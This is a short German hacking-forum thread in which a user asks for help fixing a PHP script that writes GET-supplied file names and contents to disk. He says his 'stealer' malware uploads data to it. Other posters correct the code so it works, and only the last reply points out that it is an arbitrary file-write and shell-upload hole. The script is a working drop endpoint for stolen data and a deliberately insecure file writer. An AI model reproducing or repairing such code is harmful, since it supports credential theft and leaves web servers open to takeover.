PHP Fehler in Linie 4

[boterfreak]

Hallo, Ich Habe Folgenden Code.

PHP-Code:

<?php
$file = $_GET['file'];
$daten = $_GET['daten'];
file_put_contents($file,$daten)
?>

Blos wenn ich ihn so aufrufe kommt dort Warning: file_put_contents() [function.file-put-contents]: Filename cannot be empty in /home/freehost/t35.com/b/o/blahblahblah/send.php on line 4

woran liegt es??

Free Web Hosting - Reliable Free Hosting - cPanel Hosting - T35 Hosting Hier hoste ich es

[Malw0rm]

Erstmal fehlt hinter file_put_contents n semikolon
2. musst du checken ob GET gesetzt ist.

Fixxed:

PHP-Code:

<?php
if($_GET['file'] && $_GET['daten']) {
    $file = $_GET['file'];
    $daten = $_GET['daten'];
}
else {
    exit;
}
    file_put_contents($file,$daten);
?>

[boterfreak]

Das File wird ja vom stealer erstellt und hochgeladen

[Malw0rm]

Dann musst du es downloaden und ändern, und wieder uploaden

[boterfreak]

Ich werds einfach per ftp Upload oder Email oder MYSQL Machen Danke für deine Hilfe.

[pry0]

Sollte die Zeile "

file_put_contents($file,$daten);

" nicht lieber in die IF-Verzweigung.. wäre irgendwie sinnvoller? ^^

[AlterHacker]

Aufgrund des exit im else kann das file_put_contents auch drunter stehen
Ich persönlich würd das exit weglassen und die Funktion ins if schreiben.

[blackberry]

Und ich persönlich würde aufhören Shell-Upload-Scripts zu programmieren.
Aber gut... manche Leute haben wohl gern eine Shell auf dem Webspace...
(wer den Fehler nicht erkennt, dem sei das selbe gesagt, was ich auch schon Code-C4 vor nicht allzu kurzer Zeit gesagt habe: Userinput gehört verdammtnochmal nicht in Dateinamen!)